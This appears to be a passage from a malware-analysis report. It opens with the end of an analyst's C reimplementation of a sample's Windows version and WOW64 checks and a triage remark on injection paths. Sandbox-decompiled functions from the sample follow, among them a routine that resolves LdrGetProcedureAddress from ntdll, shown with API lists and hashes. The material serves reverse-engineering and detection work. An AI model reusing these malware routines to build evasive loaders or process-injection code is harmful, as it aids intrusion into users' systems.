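typedef BOOL (WINAPI *IsWow64Process_t)(HANDLE, PBOOL);

/* Same call sequence as the report's APIs list: GetModuleHandleW(L"ntdll.dll")
 * then GetProcAddress("RtlGetVersion"). Malware favours RtlGetVersion over
 * GetVersionEx because it is not affected by application-compatibility shims. */
int detect_os_class(void)
{
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    RtlGetVersion_t fn = ntdll ? (RtlGetVersion_t)GetProcAddress(ntdll, "RtlGetVersion") : NULL;
    RTL_OSVERSIONINFOW vi;
    vi.dwOSVersionInfoSize = sizeof vi;
    if (fn == NULL || fn(&vi) != 0)   /* STATUS_SUCCESS is 0 */
        return classify_os_version(0, 0);
    return classify_os_version(1, pack_version(vi.dwMajorVersion, vi.dwMinorVersion));
}

/* Mirror of E035D8270: returns the WOW64 flag, or FALSE when the export is
 * absent or the call fails (the decompiled routine returns the failed BOOL). */
BOOL is_wow64_process(HANDLE process)
{
    BOOL wow64 = FALSE;
    HMODULE k32 = GetModuleHandleW(L"kernel32");
    IsWow64Process_t fn = k32 ? (IsWow64Process_t)GetProcAddress(k32, "IsWow64Process") : NULL;
    if (fn == NULL || !fn(process, &wow64))
        return FALSE;
    return wow64;
}

int main(void)
{
    printf("os class %d, wow64 %d\n",
           detect_os_class(), (int)is_wow64_process(GetCurrentProcess()));
    return 0;
}
#else
/* Off Windows only the classification logic can be exercised. */
int main(void)
{
    printf("5.1 -> %d, 6.1 -> %d, 10.0 -> %d, unresolved -> %d\n",
           classify_os_version(1, pack_version(5, 1)),
           classify_os_version(1, pack_version(6, 1)),
           classify_os_version(1, pack_version(10, 0)),
           classify_os_version(0, 0));
    return 0;
}
#endif
```

For triage the useful observation is the pairing of the two checks: a 32-bit image that asks both for the exact kernel version and for its own WOW64 state is deciding which payload or injection path to take, so the value left in the 0x37a2e08 global is worth watching when stepping through the later injection code in this process.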

                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                          			E035D21A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                          				long _v8;
                                                                                                                                          				signed int _v16;
                                                                                                                                          				void* _v20;
                                                                                                                                          				signed int _v32;
                                                                                                                                          				intOrPtr _v36;
                                                                                                                                          				intOrPtr _v40;
                                                                                                                                          				char _v44;
                                                                                                                                          				signed int _t22;
                                                                                                                                          				void* _t24;
                                                                                                                                          				short _t27;
                                                                                                                                          				void* _t31;
                                                                                                                                          				signed int _t37;
                                                                                                                                          				signed int _t38;
                                                                                                                                          				void _t40;
                                                                                                                                          				signed int _t46;
                                                                                                                                          				void* _t52;
                                                                                                                                          				intOrPtr _t57;
                                                                                                                                          				void* _t61;
                                                                                                                                          				void* _t62;
                                                                                                                                          
                                                                                                                                          				_t46 = __edx;
                                                                                                                                          				_t22 =  *0x37a1128; // 0x0
                                                                                                                                          				_t62 = _t61 - 0x28;
                                                                                                                                          				_t64 = _t22 |  *0x37a112c;
                                                                                                                                          				if((_t22 |  *0x37a112c) != 0) {
                                                                                                                                          					L3:
                                                                                                                                          					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4);
                                                                                                                                          					_t52 = _t24;
                                                                                                                                          					__eflags = _t52;
                                                                                                                                          					if(_t52 != 0) {
                                                                                                                                          						_t2 = _t52 + 0x18; // 0x18
                                                                                                                                          						_t57 = _t2;
                                                                                                                                          						E035D17E0(_t57, _a12);
                                                                                                                                          						asm("cdq");
                                                                                                                                          						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
                                                                                                                                          						 *(_t52 + 0x14) = _t46;
                                                                                                                                          						_t27 = E035D1850(_t57);
                                                                                                                                          						asm("xorps xmm0, xmm0");
                                                                                                                                          						 *((short*)(_t52 + 8)) = _t27;
                                                                                                                                          						 *((short*)(_t52 + 0xa)) = _t27;
                                                                                                                                          						_t8 = _t52 + 8; // 0x8
                                                                                                                                          						 *_t52 = 0;
                                                                                                                                          						 *(_t52 + 4) = 0;
                                                                                                                                          						asm("cdq");
                                                                                                                                          						_v36 = _t8;
                                                                                                                                          						_v32 = _t46;
                                                                                                                                          						asm("cdq");
                                                                                                                                          						_v20 = _t52;
                                                                                                                                          						_v44 = _a4;
                                                                                                                                          						_v40 = _a8;
                                                                                                                                          						asm("movlpd [ebp-0x18], xmm0");
                                                                                                                                          						_v16 = _t46;
                                                                                                                                          						_t31 = E035D1D10( *0x37a1128,  *0x37a112c,  &_v44, 4);
                                                                                                                                          						_t40 =  *_t52;
                                                                                                                                          						_v8 = 0;
                                                                                                                                          						_v8 =  *(_t52 + 4);
                                                                                                                                          						VirtualFree(_t52, 0, 0x8000);
                                                                                                                                          						__eflags = _t31;
                                                                                                                                          						if(_t31 < 0) {
                                                                                                                                          							__eflags = 0;
                                                                                                                                          							return 0;
                                                                                                                                          						} else {
                                                                                                                                          							return _t40;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						__eflags = 0;
                                                                                                                                          						return _t24;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					_t37 = E035D22B0(_t46, E035D1E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
                                                                                                                                          					_t62 = _t62 + 0x10;
                                                                                                                                          					 *0x37a1128 = _t37;
                                                                                                                                          					_t38 = _t37 | _t46;
                                                                                                                                          					 *0x37a112c = _t46;
                                                                                                                                          					if(_t38 != 0) {
                                                                                                                                          						goto L3;
                                                                                                                                          					} else {
                                                                                                                                          						return _t38;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000120,00003000,00000004,?,?,?,?,?,035D6208,?,?,NtGetContextThread,?,?,?), ref: 035D21F0
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,035D6208,?), ref: 035D228F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                          • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                                                          • API String ID: 2087232378-1174695804
                                                                                                                                          • Opcode ID: 603edc4a2b6608248f67380ff8f7987a1bc6e19c2325cae66feefea40327285c
                                                                                                                                          • Instruction ID: 45ccf5afb3632db8ad3229437d8514ac31c95afecf1715976bbfca3aeee0caf0
                                                                                                                                          • Opcode Fuzzy Hash: 603edc4a2b6608248f67380ff8f7987a1bc6e19c2325cae66feefea40327285c
                                                                                                                                          • Instruction Fuzzy Hash: 8E31A675E01605ABD710DFA9EC41B9AF7B5FFC8310F10C56AE908A7210D77495108BD4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D16A0(void* _a4, long _a8) {
                                                                                                                                          				long _t5;
                                                                                                                                          				long _t9;
                                                                                                                                          
                                                                                                                                          				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
                                                                                                                                          				_t9 = _t5;
                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                          					HeapFree(GetProcessHeap(), _t5, _a4);
                                                                                                                                          					return _t9;
                                                                                                                                          				}
                                                                                                                                          				return _t5;
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,035D4D23,00000000,?,035D4D23,00000000,00000000), ref: 035D16AC
                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,035D4D23,00000000,00000000), ref: 035D16B3
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,035D4D23,00000000,00000000), ref: 035D16C3
                                                                                                                                          • HeapFree.KERNEL32(00000000,?,035D4D23,00000000,00000000), ref: 035D16CA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$Process$AllocFree
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 756756679-0
                                                                                                                                          • Opcode ID: a94f07b390372ee406bc08dd9083b8a7a80c249baf1fdf6b6a354e80bbae0889
                                                                                                                                          • Instruction ID: 306bc5fe152a101d8448afac6f2986d27976a5f4ee0d52de14bc5aa52a9c6e1d
                                                                                                                                          • Opcode Fuzzy Hash: a94f07b390372ee406bc08dd9083b8a7a80c249baf1fdf6b6a354e80bbae0889
                                                                                                                                          • Instruction Fuzzy Hash: E4E0B63A541225BBCB212EE5B80CE9A3E2DAB086A2B088010FA09C6224C7318525EB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%